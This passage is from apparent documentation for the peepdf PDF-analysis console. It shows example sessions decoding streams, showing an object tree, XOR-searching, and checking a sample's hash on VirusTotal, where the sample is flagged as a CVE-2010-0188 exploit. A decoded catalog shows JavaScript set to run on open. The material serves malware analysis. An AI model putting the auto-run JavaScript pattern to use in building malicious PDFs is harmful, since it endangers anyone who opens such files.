78 da 05 c1 7b 7f 6a 60 00 00 e0 cf 72 dc 5e 8b |x...{�j....r.^.| 5a 26 22 8a 37 62 ea 87 cd ad 8b cb ab 25 e4 54 |Z&".7b.......%.T| a7 da fa 77 9f fd 3c cf 92 bd 3f 18 bd 89 47 50 |...w..<...?...GP| 69 69 d2 81 34 6b 3b f5 c2 17 cc d3 6b bb 90 f8 |ii..4k;.....k...| b7 b0 f5 5e 58 48 7c 7f 84 1a 1c b8 ed f9 4e 23 |...^XH|�......N#| 40 2a 68 5e 43 af eb 7b 8e f2 35 cb f0 2a 2b 3f |@*h^C..{..5..*+?| 41 95 64 b0 a9 af d8 a1 f0 af 51 eb 39 e3 b7 34 |A.d.......Q.9..4| 2a 84 9d 41 1c 5f ad 59 82 3b fd e9 4a 35 39 9b |*..A._.Y.;..J59.| db 30 64 3e 92 d4 6c 21 98 e4 0b 2b 31 e7 e8 6e |.0d>..l!...+1..n| 21 89 2e f6 d4 96 57 b4 54 1e 26 61 b7 b6 16 93 |!.....W.T.&a....| 67 68 b8 be 8b 79 f1 fe 82 ee eb e2 99 92 f7 68 |gh...y.........h| b0 b4 5c 14 10 dc 38 3f dc f8 d0 ac 60 ff 36 a5 |..\...8?.....6.| d6 d8 e3 b2 61 75 0c 2b 1f a6 b6 17 5a cd ea 3a |....au.+....Z..:| 7f ff a3 11 b6 38 e0 29 5c e0 6e 72 a9 73 1b 6d |�....8.).nr.s.m| 2e c7 9c 92 83 a3 48 96 bb 3f cc 64 85 af a8 44 |......H..?.d...D| 92 ed a6 50 e9 56 fa 4b f5 6f e2 67 e0 43 e6 56 |...P.V.K.o.g.C.V| 7d d8 58 10 a9 70 a8 e0 3b 25 d1 29 e3 ab 2a 7b |}.X..p..;%.)..{| f2 2a bd c8 9d c1 51 64 80 d5 8c e0 70 f6 74 0b |.....Qd....p.t.| bc 73 47 52 c8 e3 3a 2c 66 2f c1 bf 1f 10 27 ea |.sGR..:,f/....'.| ee 31 b2 4c 15 80 51 c5 1e 76 bc 7b 9a 65 c4 7b |.1.L..Q..v.{.e.{| ef a4 20 66 b9 42 43 8e 96 3b 28 9e 45 4b a2 c4 |.. f.BC..;(.EK..| a9 21 74 6c 93 15 44 b9 05 5a 63 e7 66 d4 a8 48 |.!tl..D..Zc.f..H| 2e e7 39 18 c7 c6 58 19 82 0d 16 7c 5f 7b c7 8b |..9...X....|_{..| 8a ab 6b 2f e5 eb 24 3c 6c f5 8a d8 ca 68 51 3c |..k/..$<l....hQ<| 9e cb 89 f3 3b fb 0f 6c d4 7d d7 0d 0a |....;..l.}...|

PPDF> show stream5

78 da 05 c1 7b 7f 6a 60 00 00 e0 cf 72 dc 5e 8b |x...{�j....r.^.| 5a 26 22 8a 37 62 ea 87 cd ad 8b cb ab 25 e4 54 |Z&".7b.......%.T| a7 da fa 77 9f fd 3c cf 92 bd 3f 18 bd 89 47 50 |...w..<...?...GP| 69 69 d2 81 34 6b 3b f5 c2 17 cc d3 6b bb 90 f8 |ii..4k;.....k...| b7 b0 f5 5e 58 48 7c 7f 84 1a 1c b8 ed f9 4e 23 |...^XH|�......N#| 40 2a 68 5e 43 af eb 7b 8e f2 35 cb f0 2a 2b 3f |@*h^C..{..5..*+?| 41 95 64 b0 a9 af d8 a1 f0 af 51 eb 39 e3 b7 34 |A.d.......Q.9..4| 2a 84 9d 41 1c 5f ad 59 82 3b fd e9 4a 35 39 9b |*..A._.Y.;..J59.| db 30 64 3e 92 d4 6c 21 98 e4 0b 2b 31 e7 e8 6e |.0d>..l!...+1..n| 21 89 2e f6 d4 96 57 b4 54 1e 26 61 b7 b6 16 93 |!.....W.T.&a....| 67 68 b8 be 8b 79 f1 fe 82 ee eb e2 99 92 f7 68 |gh...y.........h| b0 b4 5c 14 10 dc 38 3f dc f8 d0 ac 60 ff 36 a5 |..\...8?.....6.| d6 d8 e3 b2 61 75 0c 2b 1f a6 b6 17 5a cd ea 3a |....au.+....Z..:| 7f ff a3 11 b6 38 e0 29 5c e0 6e 72 a9 73 1b 6d |�....8.).nr.s.m| 2e c7 9c 92 83 a3 48 96 bb 3f cc 64 85 af a8 44 |......H..?.d...D| 92 ed a6 50 e9 56 fa 4b f5 6f e2 67 e0 43 e6 56 |...P.V.K.o.g.C.V| 7d d8 58 10 a9 70 a8 e0 3b 25 d1 29 e3 ab 2a 7b |}.X..p..;%.)..{| f2 2a bd c8 9d c1 51 64 80 d5 8c e0 70 f6 74 0b |.....Qd....p.t.| bc 73 47 52 c8 e3 3a 2c 66 2f c1 bf 1f 10 27 ea |.sGR..:,f/....'.| ee 31 b2 4c 15 80 51 c5 1e 76 bc 7b 9a 65 c4 7b |.1.L..Q..v.{.e.{| ef a4 20 66 b9 42 43 8e 96 3b 28 9e 45 4b a2 c4 |.. f.BC..;(.EK..| a9 21 74 6c 93 15 44 b9 05 5a 63 e7 66 d4 a8 48 |.!tl..D..Zc.f..H| 2e e7 39 18 c7 c6 58 19 82 0d 16 7c 5f 7b c7 8b |..9...X....|_{..| 8a ab 6b 2f e5 eb 24 3c 6c f5 8a d8 ca 68 51 3c |..k/..$<l....hQ<| 9e cb 89 f3 3b fb 0f 6c d4 7d d7 0d 0a |....;..l.}...|

[Index](#showing-information)
<br />
### show ###

Usage: show var_name

Shows the value of the specified variable

Special variables:

header_file
malformed_options
output
output_limit
sctest

PPDF> set myHelloVar "Hello World!!" PPDF> show myHelloVar

Hello World!!

[Index](#showing-information)
<br />
### stream ###

Usage: stream object_id [version]

Shows the object stream content of the specified version after being decoded and decrypted (if necessary)

PPDF> rawstream 1

78 9c 45 8e c1 0a 83 30 10 44 ef f9 8a f9 83 4d |x.E....0.D.....M| 5a 15 0b 22 b4 de 2c a5 a2 bd 15 0f c1 06 09 14 |Z.."..,.........| 23 1a 4b fb f7 5d 6b a0 2c 7b d8 61 e6 ed 28 48 |#.K..]k.,{.a..(H| ec 10 2b ec 71 88 10 41 25 29 b2 0c 74 fb 8c 06 |..+.q..A%)..t...| 54 68 af 9f ae 17 54 e9 de cc 6c 94 a8 05 5d 47 |Th....T...l...]G| 33 1c 3b 6f dd c0 01 56 90 e7 6b e4 6c 1f 33 ee |3.;o...V..k.l.3.| 0c 5a a5 56 04 c4 2f 29 a8 70 cb e0 a1 82 b5 d2 |.Z.V../).p......| 93 e1 33 f0 fe 46 41 b5 99 dd 32 75 fc 8c 7d 79 |..3..FA...2u..}y| 2e e8 62 1e 56 9f dc 9b c9 92 27 91 12 29 6f 1b |..b.V.....'..)o.| 48 5b 76 6b 23 a8 01 95 fa a5 9b 6e b2 a3 17 54 |H[vk#......n...T| 36 88 43 c1 2f a0 0d 3e 09 0a |6.C./..>..|

PPDF> stream 1

1 0 2 51 3 94 4 168 << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >><< /Kids [ 3 0 R ] /Type /Pages /Count 1 >><< /Parent 2 0 R /Type /Page /Resources << >> /MediaBox [ 0 0 600 800 ] >><< /Type /Action /S /JavaScript /JS 5 0 R >>

[Index](#showing-information)
<br />
### tree ###

Usage: tree [num_version]

Shows the tree graph of the file or specified version

It's useful to see all the dependencies between objects in a visual way, the output is the logical structure of the document.

PPDF> tree

/Catalog (1) /Fields (5) array (2) /JavaScript (7) /Names (10) /Action /JavaScript (12) string (13) /Pages (4) /Page (9) /Pages (4) stream (11) /ProcSet (8) /ProcSet (8) /Outlines (3) dictionary (6) /Info (14)

[Index](#showing-information)
### vtcheck ###

Usage: vtcheck Usage: vtcheck object|rawobject|stream|rawstream $object_id [$version] Usage: vtcheck raw $offset $num_bytes Usage: vtcheck file $file_name Usage: vtcheck variable $var_name

Checks the hash of the specified source on VirusTotal: raw bytes of the file, objects and streams, and the content of files or variables. If no parameters are specified then the hash of the PDF document will be checked.

*** NOTE: NO CONTENT IS SENT TO VIRUSTOTAL, JUST HASHES!!

*** NOTE: You need a VirusTotal API key to use this command.

With this command you can check the hash of the PDF file on [VirusTotal](https://www.virustotal.com). But not only the PDF file itself but also the hash of any object, rawobject, stream, rawstream, raw bytes, files or variable. It is important to say that no content is sent to VirusTotal, just the hashes. Also, you will need a VirusTotal API key to use this command.

Detection rate: 26/47 Last analysis date: 2013-07-01 05:43:24 Report link: https://www.virustotal.com/file/ba3c7c763f7910ef956e27be054e9271b00d05aab9fb153cdf30001ce422d68a/analysis/1372657404/ Scan results:

             nProtect	     2013-07-01.01	  20130701	Exploit.TIFF.Gen
               McAfee	      5.400.0.1158	  20130701	Artemis!7101F6998958
          K7AntiVirus	        9.170.8927	  20130628	Exploit
               F-Prot	         4.7.1.166	  20130630	CVE-0188
             Symantec	     20131.1.0.101	  20130701	Trojan.Pidief.I
               Norman	           7.01.04	  20130701	Exploit_Gen.KDB
 TrendMicro-HouseCall	      9.700.0.1001	  20130701	TROJ_GEN.R4FH1KI
                Avast	      8.0.1489.320	  20130701	JS:Pdfka-gen [Expl]
            Kaspersky	         9.0.0.837	  20130701	HEUR:Exploit.Script.Generic
          BitDefender	               7.2	  20130701	Exploit.TIFF.Gen
              Agnitum	           5.5.1.3	  20130630	Exploit.CVE-2010-0188
             Emsisoft	         3.0.0.583	  20130701	Exploit.TIFF.Gen (B)
               Comodo	             16523	  20130701	UnclassifiedMalware
             F-Secure	     11.0.19100.45	  20130701	Exploit.TIFF.Gen
                DrWeb	                  	  20130701	SCRIPT.Virus
              AntiVir	        7.11.88.12	  20130701	EXP/Pdfjsc.EH.14
           TrendMicro	      9.740.0.1012	  20130701	EXPL_CVE20100188
               Sophos	            4.90.0	  20130701	Troj/PDFJs-II
            Microsoft	            1.9607	  20130701	Exploit:Win32/Pdfjsc.EX
                GData	                22	  20130701	Exploit.TIFF.Gen
            Commtouch	           5.4.1.7	  20130630	CVE-0188
              PCTools	           9.0.0.2	  20130701	Trojan.Pidief
               Ikarus	        T3.1.4.3.0	  20130701	Exploit.Win32.CVE-2010-0188
             Fortinet	         5.1.146.0	  20130701	W32/PDFJs.II!tr
                  AVG	       10.0.0.1190	  20130630	Exploit
                Panda	          10.0.3.5	  20130630	Exploit/PDF.Gen.B
### xor ###

Usage: xor stream|rawstream $object_id [$version] [$key] Usage: xor raw $offset $num_bytes $key Usage: xor file $file_name $key Usage: xor variable $var_name $key

Performs an XOR operation using the specified key with the content of the specified file or variable, raw bytes of the file or stream/rawstream. If the key is not specified then a bruteforcing XOR is performed.

PPDF> xor file test_file 0x12

Z{>2fz{a2{a2s2fwaf2t{~w3

PPDF> xor stream 7 0xfa

d2 bb 9b 9b 9b 9b d3 da ae 90 |..........|

If the key is not specified then a bruteforcing XOR is performed:

PPDF> xor stream 7

[0x0] (Aaaaa) Tj [/0x0] [0x1] )@````(!Uk [/0x1] [0x2] Ccccc+"Vh [/0x2] [0x3] +Bbbbb#Wi [/0x3] [0x4] ,Eeeee-$Pn [/0x4] [0x5] -Ddddd,%Qo [/0x5] [0x6] .Ggggg/&Rl [/0x6] [0x7] /Fffff.'Sm [/0x7] ...

PPDF> xor raw 100 50 0x16

&6yt|**9Zsxqb~6%'$69P�zbsd69PzwbsRsuyrs6((ebdsw{

[Index](#showing-information)
### xor\_search ###

Usage: xor_search [-i] stream|rawstream $object_id [$version] $string_to_search Usage: xor_search [-i] raw $offset $num_bytes $string_to_search Usage: xor_search [-i] file $file_name $string_to_search Usage: xor_search [-i] variable $var_name $string_to_search

Searches for the specified string in the result of an XOR brute forcing operation with the content of the specified file or variable, raw bytes of the file or stream/rawstream. The output shows the offset/s where the string is found. It's a case sensitive search but it's possible to make it insensitive using -i.

PPDF> xor_search stream 2 "template"

Pattern found with the following keys: ['0x0']

Offsets for key '0x0': [407, 466, 607, 624, 684, 825, 843, 903, 1044]

PPDF> xor file test_file 0x63 > xored_test PPDF> xor_search file xored_test "file"

Pattern found with the following keys: ['0x63']

Offsets for key '0x63': [19]

PPDF> xor_search -i file xored_test "file"

Pattern found with the following keys: ['0x43', '0x63']

Offsets for key '0x43': [19] Offsets for key '0x63': [19]

PPDF> xor file xored_test 0x43

hI THISISATESTFILE*

PPDF> xor file xored_test 0x63

Hi, this is a test file!

[Index](#showing-information)
<br />